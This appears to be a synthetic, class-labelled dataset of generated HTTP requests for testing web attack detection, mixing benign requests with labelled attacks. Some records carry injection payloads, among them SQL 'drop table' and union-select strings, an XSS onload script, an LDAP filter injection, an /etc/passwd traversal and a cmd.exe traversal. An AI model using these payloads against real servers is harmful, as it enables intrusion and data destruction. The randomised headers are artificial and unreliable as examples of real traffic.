If-Range: Thu, 14 Apr 05 23:51:19 CET
Max-Forwards: 3
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Basic VGRydHNtdDp0YUhnOW84RQ==
Range: 711-
Referer: /eqaexet.png
TE: deflate;q=0.1
Trailer: If-None-Match
User-Agent: Mozilla/4.4 (X11; U; Open BSD i386 7.0; n1-dE; rv:2.6.9) Gecko/49842374
UA-CPU: 68000
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: 1.2 131.110.131.35:8054, 9.6 124.224.232.163
Transfer-Encoding: gzip
Upgrade: ltbi/4.7, tales/0.8, zhnie/8.7, osts/9.3, yne/5.8
Warning: 883 www.uoctiy9.gif "iy8rsanss" "Tue, 08 Apr 08 02:11:02 CET"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

oAgodr=';     drop    table    admin&asA8gllerHs=26647677&7asl=bap(cfo/he&pypvhsxatre=bnZnGUtu&replaceQUtelnetIvkand=7616717&nuugde9nseif0l=lZ1gTu8C&WVwr5XI2xhomev=<xmlfaNag(tn tni&tHhssvti0ee=270227&itaqh=hti&dntrpw=9nn&ttbffaed2inRlf=~:a&ltbaxryis1mn=ta&NsaiW=ol&ft8edts=S0io&wa9w=sfdn

End - Id: 41399
Start - Id: 7604
class: Valid
PUT /fSqijvMs50dDT0Ci-8O/g1454IWCQtLLg9DP7/oYtNG4o/nUxRHp/w0@L2EB5Antf7lJDeZ/eEnmdExM7GK.8RG/0ZN6adminmftaccess_log/ir1e5nfTg/elcrtl.cgi? HTTP/1.0
Content-Length: 226
Content-Language: s9Ecx,iImpere
Content-Encoding: compress
Content-Location: http://iohDilir.be/oai2ta/t6mEh/e7iatzs.shtml
Content-MD5: ZHVyZk5vdG9IN2VoRUJsbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Jul 06 04:41:24 GMT
Last-Modified: Thu, 06 Dec 07 18:56:22 CET
Host: www.t3je.fr
Connection: close
Accept: audio/basic, text/*;q=0.2, image/gif
Accept-Charset: cp-950;q=0.6
Accept-Encoding: compress, deflate
Accept-Language: 2-rad2s;q=0.0, w-ndlk
Cache-Control: only-if-cached
Client-ip: 59.181.165.188
Cookie: W8X=2duelonerdetkh1m8;yiSeeuaIae=n0b eafe;aezkDfs4Xoom7E=easmliwoOn;nreplaceLmUZDxr=mijfN;Yf0NJ9rTYPk=Rlt)ia==u&sg Osperl;8Kdhxlvyscript=orwgety
Date: Fri, 01 May 09 22:25:44 UTC
ETag: W/"V8t2vRhbju5hRTsr2"
Expect: hsxi0htd=ntro;sw3uun
From: eesw@nLccynrn9.gov
If-Modified-Since: Sun, 11 Jun 06 12:23:54 CET
If-Unmodified-Since: Sat, 07 Apr 07 21:28:49 CET
If-Match: "@6VSBZ_TY_8_g3cN6q"
If-None-Match: *
If-Range: Wed, 10 Dec 08 06:08:25 UTC
Max-Forwards: 58
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM dDdzYm1hZXRhbG9vc0xLc2VuSXdhRXRlU3BqTG5hcnVhdW9y
Authorization: Basic bGF0ZXVhOmk5NGFsRWV6
Range: 4990-,-42306,415-
Referer: http://5agoqrEN.org/ctbltbee.pdf
TE: trailers
User-Agent: Mozilla/0.4 (Machintosh; U; Mac OS X 5.5; ae-xa; rv:6.5.4) Gecko/61968994
UA-OS: WinNT
UA-Color: color32
Via: HTTP/6.1 www.ncwaauk.tiff, 3.2 www.tshe.js
Transfer-Encoding: identity
Upgrade: rOmVn/8.0
X-Forwarded-For: 223.150.236.173
----: -----------------------

cn0avyeStsmm=641348&gci=8&lonewwet=1224&drxaolrTtch=001125&-CUG=dlt&titutj=v7np&maais=rcwLX_GfBLT9&OO2heiextasNaeg=4047949038&0HgAwherehPm=te7h&watte5odhteaaWi=0543&nsqseLd=tqoui9eoR&eaxgopbMsve1oa=62247827&3At=eeutoeseeb0rep4

End - Id: 7604
Start - Id: 38291
class: LdapInjection
GET /sw_2SpDn/phncnidtifaaATtm/eijKAvgyE2tss/tcse1vywua9eio6la/emdn8tiaite5ibrstr.nsf?c1etqme7awtspaz=64694&objectTS15=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&sytrhRls=ntn HTTP/1.1
Host: www.RyvEd.ch
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-5, euc-cn;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.9
Cache-Control: max-age=69
Client-ip: 29.13.37.141
Cookie: ghysawinmg=7;roC2om-7mBn.=6xGUa;illHaiduyhyamat=t?ri;ok5ro1t7esGv=8nE;a0yAd=hbij0e0ew7Oe7rsiap
Cookie2: $Version="436"
Date: Tue, 12 May 09 09:36:28 CET
ETag: W/"Bq3JVGm2RGFCrlvj"
Expect: 100-continue
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Thu, 15 Apr 10 22:22:23 GMT
If-Unmodified-Since: Fri, 20 Jun 08 21:41:19 CET
If-Match: "ET@jdlgsXoHJHvB"
If-None-Match: "6-q2N90f9zcQjfY"
If-Range: Sun, 30 Apr 06 10:22:45 GMT
Max-Forwards: 7767
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic bWxnSDA6dHRlZWVlaWg=
Range: 6717-,60-,18458-657
Referer: http://teof.de/fsRr3go/ot5s8TE/a1a1a/tnpoh.png
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: uUAzFcP http://www.daetj0.uk
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: 8.4 www.5foeno.html:3, HTTP/0.6 157.33.222.250, FTP/1.5 www.kAder.html:511
Transfer-Encoding: deflate
Upgrade: segoo/3.8
Warning: 579 www.htehr.shtml:7460 "fyeYeyiN4nSSEx4" 
X-Forwarded-For: 20.129.147.18
X-Serial-Number: 055236562928
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38291
Start - Id: 6504
class: Valid
PUT /F903ea6s.css? HTTP/1.1
Content-Length: 124
Content-Language: ht4u5t5,sxgiee
Content-Encoding: compress
Content-Location: http://Eonr.org/sdhzNese/Pwteph/ledeies/nnytih.asp
Content-MD5: NHplaGV4Y2dyeHl0emplZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Mar 07 09:32:12 CET
Last-Modified: Sat, 24 Apr 04 05:37:21 GMT
Host: 178.9.195.100
Connection: nne9
Accept: */*
Accept-Charset: hz-gb-2312;q=0.7
Accept-Encoding: *
Accept-Language: hlXyie-ctosohie;q=0.6, r-o1re, enroae-osect;q=0.8, o-c1pr1rn
Cache-Control: only-if-cached
Client-ip: 197.127.12.143
Cookie: 9ri=hoconnectwindow.openut1Tsdc;BDsl=lwrzngam\o abton;neccrbuh8ie=731329699;bpets=7;f7k9LT=3shErsetQeahLLjiea
Cookie2: $Version="12"
Date: Mon, 12 Oct 09 18:13:01 GMT
ETag: W/"WTPTmdf-i0q-ybK"
Expect: 100-continue
From: s4epsqsd@rotiihceen.net
If-Modified-Since: Mon, 10 May 04 09:52:26 UTC
If-Unmodified-Since: Sat, 02 Jan 10 17:08:34 UTC
If-Match: *
If-None-Match: "HjEjSj48T3ukwNsxuE3@"
If-Range: "zbxZg9W5tyXcGIo9W9Me"
Max-Forwards: 791
MIME-Version: 7.4
Pragma: khrphy=rhnf4t
Proxy-Authorization: NTLM ZXludzZ2cjlvYWVhcTV0S0RjNG9Ud3Nzb2F1b2NuZDc=
Authorization: Digest nc=3DE432e4
Range: -0,37191-913541,986937-
Referer: /udai1Dx/GHsldTf.shtml
TE: deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: u254z1 http://www.pvie0tt.ch
UA-CPU: x86
UA-Disp: 8394,8208,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9481x739
Via: 2.6 www.lbamm.js, 2.0 139.64.235.154
Transfer-Encoding: deflate
Upgrade: ropcwa/9.2
Warning: 905 www.vuHjLrce.jpeg "bzvewwcnnhcIww" "Sat, 06 Mar 04 23:19:48 UTC"
X-Forwarded-For: 217.19.212.140
X-Serial-Number: 58041011028
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

iea6tnko6=iASL&Dpglib=nti&ee=7930567&5oVinputolfB@-=31g1sC4wQ89&oberruokorabod=4300971&maugwMqt=e&hocoiooq2r=cuht7fucoennlei

End - Id: 6504
Start - Id: 12229
class: Valid
GET /pRyTvJLjxrGVcAZXd/cPo3s6_vBn/bdiv5Gk/jCdocumentzNfETi/v3-.bin?mi6tpar=49070311&sitwm=8323742&teLtbp0zd=hat&taemtTrleghn=epR1BceOtder&eaoaagienrig=2h&0n=u&wnete38eo=iwYgTsvHL&utmeoigrghnieun=Oo0&IYdPtoSFcmdF=%24n%7Eocst+beia%25o&ejssnaiAbfng=i%28smnralfa&inG.1evalg=Bw+ducmy&heIrndUtaeW1r=87 HTTP/1.1
Host: 135.125.96.232
Connection: close
Accept: audio/*;q=0.2, application/*, application/postscript;q=0.7
Accept-Charset: x-mac-cyrillic, iso-8859-1, windows-1252
Accept-Encoding: *
Accept-Language: *
Cache-Control: aPalsm=U9cdBt
Client-ip: 218.85.114.86
Cookie: ohBd=ra
Cookie2: $Version="3"
Date: Sat, 07 Mar 09 06:51:06 UTC
ETag: "GrpqPH7QKMK6-iZdlT"
Expect: 100-continue
From: msaq@tanxaosh5.ch
If-Modified-Since: Mon, 15 Jun 09 19:34:30 UTC
If-Unmodified-Since: Sun, 16 Jul 06 09:21:09 CET
If-Match: *
If-None-Match: "vyZly1b-ECvQW4jhvZ"
If-Range: Sun, 19 Oct 08 16:57:03 GMT
Max-Forwards: 68
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest nc=aF7Be755
Authorization: zg5mxx utqggea=teztr
Range: -5107
Referer: /oBItew.sh
TE: deflate;q=0.9
Trailer: Expect
User-Agent: Mozilla/5.3 (compatible; kinnee0eow; Linux i386; zeodh4esRb; ywfbrigs)
UA-CPU: PowerPC
UA-Disp: 2190,4880,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 162x739
Via: HTTP/0.6 www.2CP6zie.gif, 9.8 105.134.158.63, 4.4 www.o2h2thse.js
Transfer-Encoding: compress
Upgrade: xnhun/4.7, foajfe/4.9, tiTnoe/9.3, sHsmu/7.7
Warning: 923 82.227.208.130 "1sieiorsi7fnaN" "Thu, 22 Jan 09 13:40:31 GMT"
X-Forwarded-For: 28.18.79.109
X-Serial-Number: 928887909
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12229
Start - Id: 47999
class: XSS
GET /eazef/lsTe9rrulfra1mei.gif?lrleerIfAn3c0np=ssrtdo%2FsA%3A%5Du&ttifrvNcmmy=%3Cbody++++onload++%3D++%22%5Balert%28%27i5bks%27%29%3B%5D+%22+++%3E&sceoa=sdvarpassthru3Aga&at7soh=ecEqgaa&dmmgd2=uUZqr5&GQubkV=texec&dsseaexih=nveo HTTP/1.1
Host: www.z8x0p9Psa.uk:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 200.176.81.45
Cookie: hel=owp-;rglgqt=rnO;BM2Hlhpmeta=;t;mnumeepGtpmrt=child xlead6s ok2t
Cookie2: $Version="7"
Date: Wed, 03 Nov 04 01:50:00 UTC
ETag: W/"pbjVzqemGJN.290ZUYvt"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Mon, 12 Jun 06 10:59:26 UTC
If-Unmodified-Since: Tue, 07 Nov 06 03:57:23 CET
If-Match: "u0m@qrPn4@Mtf@KRCl"
If-None-Match: "vJSUUNrcMV9UkX9NX"
If-Range: Wed, 22 Feb 06 16:48:39 CET
Max-Forwards: 284
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM YWxlQWN1ZGJ6ZG5iZXJheXRodFJidXBlRXc2N2NibXBodHVLNWVqb0g=
Authorization: NTLM MnN5OWVpc3N3cGxyc2VlaVJ5Ymp0NmVvbzlldGFlZWs=
Range: 209-45720
Referer: /mo4e/an3itr/soPne/tAhMaarP.sh
TE: gzip;q=0.3,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.0 (X11; U; Open BSD i386 2.2; yl-rw; rv:2.2.5) Gecko/77490637
UA-CPU: StrongARM
UA-Disp: 212,5646,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3266x6869
Via: 7.8 www.aaeEbot2.html, 5.4 35.226.218.10, FTP/8.6 www.ehayCru6.html
Transfer-Encoding: ncwa; nooi=iamaeo
Upgrade: hrsloe/4.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 4179007460908292246
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47999
Start - Id: 42432
class: SqlInjection
GET /lebHD9rUXdIREUuSUY81/4FHIg/trtnlleSwa/oradhreeiuju.js?oh3ridhhden=23&dge8zteyeteo=saied&eoohnau9abthx=xpg&siw6732=150676&0d4dsap=8611&ed=w8tqOwjaf&asaiuuTdepl=419493765&munpeHenrxs=%3B++++exec+++get_cust%28+%27x%27%27+++++union+select+++++object_name%2Cobject_type%2C%27%27x%27%27+++from++user_objects++where+++++%27%27sntuyuoeo%27%27++++%3D++%27%27++%27++%29%3B&ofAmbeUrwrErtid=maetmpd9%3BS&hMie=Ty749tlab-sxp_&tNltvIhhgt1srs=7563&isrmw=i4n&i8faitievaoeehu=921&ahiwy=cmsIW HTTP/1.0
Host: www.msZ8erooaE.fr
Connection: close
Accept: audio/*, video/mpeg, image/png
Accept-Charset: x-mac-chinesesimp, euc-kr, x-mac-hebrew;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 34.227.190.70
Cookie: Id4tmochaPi4=h4eval;zgThhxdhoi=s9;ZMN1-YY5inputtmpK=met'eiiybgsound|3fromxterma|xha;rl8ORt=67;iakth8e=40978408;el6rtenHifD=3
Cookie2: $Version="2"
Date: Thu, 14 Oct 04 22:33:27 GMT
ETag: "ZSerFm.z9rWfs9@A7MH."
Expect: ctja
From: ein6@dloaflHo.biz
If-Modified-Since: Wed, 19 May 04 17:25:48 UTC
If-Unmodified-Since: Sat, 08 Aug 09 11:28:27 CET
If-Match: "Ujrdd1zz3vghUpUsi"
If-None-Match: *
If-Range: Thu, 12 Oct 06 12:44:22 UTC
Max-Forwards: 57
MIME-Version: 0.6
Pragma: leomi='oihlabna'
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: srtA rmttlde=enielqo
Range: 005696-6624,4-
Referer: http://ernuah.it/lSjap/hvti0a.tiff
TE: chunked
Trailer: If-None-Match
User-Agent: Mozilla/1.4 (Machintosh; U; Mac OS X 5.8; u9-6i; rv:2.1.5) Gecko/46420757
UA-CPU: 68000
UA-Disp: 257,8628,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: HTTP/2.7 www.alttnne.jpeg:9, 5.8 www.gfDdhe.shtml
Transfer-Encoding: deflate
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 292 www.ev6O.jpeg "hnt5llemsftyrettr" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42432
Start - Id: 9015
class: Valid
GET /eDHe5Hyoop.s6rqrtdp/9Oe.php?bl1nmOian6i7wa8=6&aov=%5Dos&Meesit=69&lcth6=qpn&adtenienta=an+nA&Eml3o1unin4l=wxjiOdvsvepaa&caeubra1h6dde=optwselecthavingi%3Dw&E1se9ob=raIhaneva&tdl4ma1briyI=%3A%27vSihavingbetweenpjoo&eeush=llzdrop+b%3Dur1aselectosS&9i9spgthmniSeii=5991898&zsshefnm=t6ti0cioecMseou&tttagE0dNna=sD&Ehtneyop=sfsystem%2B%27+Qtthmo%3Aii%28a&2K.4ps=telsO HTTP/1.1
Host: 247.187.21.192:162
Connection: 0tyimutd
Accept: image/png, image/gif;q=0.5
Accept-Charset: us-ascii, x-mac-greek, x-mac-roman
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: min-fresh=5
Client-ip: 28.236.104.175
Cookie: Q9mwhereHuZ=80439019;voqusthbhvte=664;dpE4onlheqo=hixml;aviZ6Uformzvo3U=ijaqab;UTNHwindow.openrVdocumentR0=a9PUW;a3=696980
Cookie2: $Version="71"
Date: Thu, 06 May 04 12:29:27 GMT
ETag: "BU4387R@VTCZc_r3N"
Expect: rsna=taeheo4;iaiNrrni
From: moihss@1tlab.fr
If-Modified-Since: Sat, 21 May 05 15:27:44 GMT
If-Unmodified-Since: Fri, 22 Feb 08 13:30:39 CET
If-Match: "AZjt1iYqN.ZgPAJNwHg"
If-None-Match: "PAYcFawMEcPw-qEP"
If-Range: *
Max-Forwards: 065
MIME-Version: 0.6
Pragma: aepsiD9e=lmsit
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: Digest opaque="notrsDib"
Range: -751,66639-06
Referer: http://are6i.com/rrsgi/rulYGc/5sgswp/lrbsiroo.avi
TE: trailers,deflate,trailers
Trailer: From
User-Agent: uaYleAmc/9.0.1.6.7
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7350x9086
Via: 9.7 191.245.10.160
Transfer-Encoding: teOr
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 145 191.84.114.78 "casehmDc" 
X-Forwarded-For: 111.61.129.208
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9015
Start - Id: 35466
class: SqlInjection
PUT /skZ2OIR9kG/sptoexa/Ttn56tdyptT/SpewsRtdeA/xt1lQeesfimsho1Ii/wJIobodywinnt3/2ua86AdoPnGDDetm/uiipdtRsbS/kzTA/br4uLDLCHB/cc0a5RbE8ZDV_.php3? HTTP/1.0
Content-Length: 138
Content-Language: hYis,tjt,e
Content-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Host: 135.23.245.75
Connection: AabT
Accept: text/xml
Accept-Charset: *
Accept-Encoding: *
Accept-Language: dasf-k5dtmc;q=0.0, neaoSs-eeu;q=0.8, ps-nh;q=0.2
Cookie: _uqDpg='     OR 'wiihc'     <   'X;d6=fK4B
Date: Sun, 19 Sep 04 10:37:52 GMT
If-Range: *
Referer: /bhte/Nlc6/iebsobs/sTxqipe.mpeg
User-Agent: gaorEof (e.-poXJ; sFJqhS; rv@h5Mlim; aHKAeaD; 5.CQXe9bY)
Warning: 852 www.6lemr.js "txetf5r2wagonnhsss" 

fLr47cs=>ftpts;9ae&IoS@=2267575&uscesdgm7s= psjaq&reqetsr2tson=y3hw&4FzeAn=molsvclMtrfdeiK&5lewSoui9Flnn=hdfhHhmgkvaTqoiisr&tx6bl=0781

End - Id: 35466
Start - Id: 10133
class: Valid
GET /szrEUvr5cqThPK0gh4.htm?geDnhohula0e=trltdrn&yumnlSdfl=6&t8tshbaezinirhR=91232349&srohlrWaewsetd=j&duxneddHtn=4&tbTiioi=+nd HTTP/1.0
Host: www.7eslsaon5.fr
Connection: yreekop
Accept: */*
Accept-Charset: x-mac-roman, windows-874;q=0.2, windows-1251, x-mac-hebrew, x-mac-roman;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=8175
Client-ip: 42.207.99.95
Cookie: tiaiwXeehYnhaCh=e
Cookie2: $Version="9"
Date: Wed, 06 May 09 01:55:42 GMT
ETag: W/"ZNPeIbuyDuWoq.Gflf"
Expect: jpgrt=9vdtd;nsh5uen=mOEto
From: tooao@trne6cted.it
If-Modified-Since: Mon, 26 Mar 07 21:42:04 GMT
If-Unmodified-Since: Tue, 23 Dec 08 14:16:35 CET
If-Match: *
If-None-Match: "vdxNEsMSfJfyUJKC"
If-Range: "roj1qj-mpKZ6FD.uJ8t"
Max-Forwards: 543
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: NTLM U3JyY3JhZXRkMHd4YWFlbm45bkVpRTVuM281cmhzMmVzWm4=
Range: 374825-,-184
Referer: /orOhiav1/ir5Fdatn/3iajrin.asmx
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/2.5 (X11; U; Open BSD i586 1.8; 1t-at; rv:5.2.2) Gecko/04422980
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 012x3228
Via: HTTP/5.6 www.bsneeq.shtml, 6.4 225.34.210.184
Transfer-Encoding: gzip
Upgrade: oameu/8.0, bsste/1.0
Warning: 532 www.shkroer.shtml:1701 "enin" "Sat, 30 Apr 05 12:33:33 UTC"
X-Forwarded-For: 175.87.104.128
X-Serial-Number: 42090054187399989
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10133
Start - Id: 3070
class: Valid
GET /tXY1-7s/aeNdGOUDp6NaE/eothEaxOen6ep/2sMYNfzDt/lZ/oTRC8Di6qLTh/szm2E/ooec8o0m77thiftyfsle/xS2YRqVMN/ru-K/ewS_uXZDu9XQsBTJm_.swf?onglsyt=0098246703&Rm6hepjceriRxs=83432&Atdnatttfhue=8ZSS&eftiiaoe8Ea4los=cnrcp8+wad7 HTTP/1.1
Host: 46.188.0.147:80
Connection: close
Accept: video/*;q=0.9, text/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: ta1eab-w, rduc0el-en5L, g-8nn
Cache-Control: only-if-cached
Client-ip: 203.1.184.86
Cookie: gu=eRnJ;h7er1aoCmNzuo=777817;betcKxf29A.=4<3mwb=a;lTmsedet= ;qx1-Q@.=h
Cookie2: $Version="27"
Date: Mon, 28 Aug 06 14:24:23 UTC
ETag: "ChFwZFJXIoWDzJOdt8"
Expect: az4ds
From: DUc8xa@en14iIZ4eo.cz
If-Modified-Since: Tue, 19 Jul 05 19:38:31 GMT
If-Unmodified-Since: Tue, 11 Jan 05 16:31:13 UTC
If-Match: "bsiwqUl_M4HkbM@p7_"
If-None-Match: "MZeFeXh.hy.44IT_v"
If-Range: "HfmH47NKUGeofJPU"
Max-Forwards: 234
MIME-Version: 8.9
Pragma: mnt4e=erun
Proxy-Authorization: inwn hvne4tt=Gseae
Authorization: 6zta 0tisnra=na7ee
Range: -3953,-5
Referer: http://t6IL7eex.org/vwatkE/ries/5ytsh/acWlohaa.txt
TE: gzip;q=0.4,chunked;q=0.0
Trailer: Trailer
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 0.9; ie-4e; rv:0.0.2) Gecko/31555131
UA-CPU: Sparc
UA-Disp: 6710,9525,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9081x8193
Via: inie6/7.4 www.437e.tiff, 0.2 126.30.117.44
Transfer-Encoding: gzip
Upgrade: TyHs9i/8.3, tlee/0.2, 3Drt/8.0, nnuEe3/5.2
Warning: 569 www.oeereniu.htm:0303 "atsetrg" "Wed, 17 May 06 18:16:08 CET"
X-Forwarded-For: 54.60.0.87
X-Serial-Number: 57704
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3070
Start - Id: 46311
class: PathTransversal
GET /akFUUr-AvkLfXDJ/s16a6/sztXWZWijZNMh.asmx?WV80CGo3uwhereYs=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&h7w6a7las=ac+a%7C7a&hiwetetaralwar=ib+su&mc2in=5778 HTTP/1.1
Host: www.Elsr422n.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity, deflate;q=0.4, gzip;q=0.0, deflate, deflate
Accept-Language: i-ec, cd-3fro, T-inojueze, 6s-fak, 0tta-mnc;q=0.4
Cache-Control: no-store
Client-ip: 208.222.203.198
Cookie: SalhcLiesvrTc=075506;seihaabo=128;auteeaAusXnx=ey1Uqe8vqK
Cookie2: $Version="3"
Date: Thu, 12 Jan 06 22:32:24 CET
ETag: "-GzYbTKa0ciTQ3FJ"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Thu, 12 Aug 04 19:35:31 GMT
If-Unmodified-Since: Mon, 03 Dec 07 01:57:14 UTC
If-Match: "Qwfa1QdWXZiU4g4U@M"
If-None-Match: *
If-Range: Mon, 11 May 09 16:02:32 CET
Max-Forwards: 9522
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest response="c973fB96c44fD6a45864DFA7cb1fB18f"
Authorization: Digest nc=5F2E8d2F
Range: 426-9089,-721
Referer: /heosi9nv/nthadifg/yeoeh/cN7nsNr.tar
TE: trailers,trailers
Trailer: Warning
User-Agent: Uiiefna/2.5.9
UA-CPU: Sparc
UA-Disp: 609,9430,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 2.5 66.111.4.180, tIo/8.1 114.146.227.57:61
Transfer-Encoding: deflate
Upgrade: iNrqo/0.0, 3ii6c/7.6, pN6ieo/9.3, uda/6.3
Warning: 507 www.fij6i.htm "ebesreamwt" 
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 4859376671430624
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46311
Start - Id: 43885
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.doCeVOruj.it
Connection: close
Accept: audio/basic;q=0.1, text/*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.7, gzip, deflate;q=0.2, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 182.179.139.200
Cookie: UiaE0dN8TDm=7gihadmineotmpo
Cookie2: $Version="62"
Date: Sat, 03 Nov 07 12:45:37 UTC
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: 100-continue
From: 2bgyahe@ty1w.biz
If-Modified-Since: Sat, 29 May 04 23:57:30 UTC
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: *
If-None-Match: "KApH@f0M_krvScD44c"
If-Range: "XWT7r_E_qxlhhaAwheQj"
Max-Forwards: 6
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: Digest opaque="e9nwrP8"
Range: 40517-,9-9675
Referer: http://www.iayNmoc.gov/ioLR/Tne1/sfrx1.mdb
TE: chunked;q=0.4,trailers
Trailer: If-Match
User-Agent: Mozilla/6.2 (X11; U; Linux i386 6.9; it-e5; rv:9.8.8) Gecko/79834961
UA-CPU: Sparc
UA-Disp: 708,9864,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 349x5070
Via: FTP/8.1 www.ono0zaye.css, 2ye/5.4 www.htaein.jpg, 6.6 www.aeTaqnho.html
Transfer-Encoding: compress
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 115.236.50.254
X-Serial-Number: 245906346530085
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43885
Start - Id: 46831
class: XSS
POST /8ebnflVSlKdv/nKbgT.K4rYtaDy5YTpk/lqKXazu5-I9djTfmeSct.css? HTTP/1.1
Content-Length: 78
Content-Language: t,Humziiwt,rf
Content-Encoding: identity
Content-Location: /1Tes/esin/lfancae/nr0lAnsa.pdf
Content-MD5: aW1sbmVzMWVkMmFlYzgybw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Feb 09 18:02:30 CET
Last-Modified: Mon, 12 Apr 04 10:41:14 GMT
Host: 63.80.73.13
Connection: 631ela
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 169.136.109.14
Cookie: os6rss1SgG=4847;hoGxegibeE=Ko(%iveig ?fa8wprocessing-instruction;4cFX9k=779
Cookie2: $Version="28"
Date: Sat, 18 Jun 05 23:45:44 UTC
ETag: W/"st.xMfsUAx2Keg-hqF"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Wed, 03 May 06 12:23:55 UTC
If-Unmodified-Since: Sat, 17 May 08 02:53:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 795
MIME-Version: 5.6
Pragma: ci=o7xr
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: 04-141477,-19
Referer: http://www.44eaati.com/5likn/Eeos.php3
TE: deflate;q=0.6
Trailer: If-None-Match
User-Agent: Mozilla/1.9 (Machintosh; U; PPC 2.3; 7d-aH; rv:1.8.0) Gecko/58575530
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 1.8 www.uD2z.jpg, 7.8 www.tog7ty.jpeg, FTP/3.6 159.200.13.179
Transfer-Encoding: identity
Upgrade: ccSen/7.1
